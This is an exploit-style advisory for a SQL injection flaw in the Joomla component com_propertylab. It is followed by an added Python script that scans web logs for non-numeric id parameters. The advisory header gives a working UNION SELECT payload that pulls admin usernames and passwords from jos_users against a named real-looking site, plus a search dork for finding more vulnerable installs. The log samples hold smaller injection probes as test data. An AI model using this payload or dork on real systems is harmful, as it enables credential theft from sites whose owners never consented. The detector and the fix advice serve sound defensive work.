<------------------- header data start ------------------- >

#############################################################

# author : Kadir DOGAN

# Script Name : Joomla Component com_propertylab (showstate&id) SQL injection Vuln.

# Bug Type : SQL Injection

# Infection : Admin login credentials can be obtained.

# Demo Script : habitatnationwide.com

# Demo Vuln. : habitatnationwide.com/index.php?option=com_propertylab&task=showstate&id=35+and+1=2+union+select+0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+jos_users

# Bug Fix Advice : Harmful characters should be filtered.

# Dork : inurl:index.php?option=com_propertylab


#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

index.php?option=com_propertylab&task=showstate&id=[SqL]


< -- bug code end of -- >
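
Added example, not part of the original advisory or the component's code: a log check that flags com_propertylab showstate requests whose id is not a plain integer. The log layout (Common Log Format), the sample entries and the assumption that legitimate ids are decimal integers are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate ids are plain decimal integers, like id=35 in the advisory.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")
# Client address and request target from a Common/Combined Log Format entry.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def is_suspicious(request_target):
    """True when a com_propertylab showstate request carries a non-numeric id."""
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    option = query.get("option", [""])[-1].lower()
    task = query.get("task", [""])[-1].lower()
    if option != "com_propertylab" or task != "showstate":
        return False
    # parse_qs has already decoded '+' and %XX, so encoded values are checked too.
    return any(NUMERIC_ID.fullmatch(v) is None for v in query.get("id", []))


def scan(log_lines):
    """Return (client, request_target) for every flagged log entry."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if m and is_suspicious(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits


# Constructed sample entries (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /index.php?option=com_propertylab&task=showstate&id=35 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /index.php?option=com_propertylab&task=showstate&id=35+and+1=2 HTTP/1.1" 200 812',
    '203.0.113.10 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /index.php?option=com_propertylab&task=showstate&id=35%20and%201%3D2 HTTP/1.1" 200 812',
    '198.51.100.8 - - [01/Jan/2024:10:00:12 +0000] '
    '"GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for client, target in scan(SAMPLE_LOG):
        print("non-numeric id:", client, target)
```

The same integer-only rule applied to id on the server side, before the value reaches the query, is the fix the advisory's filtering advice points at.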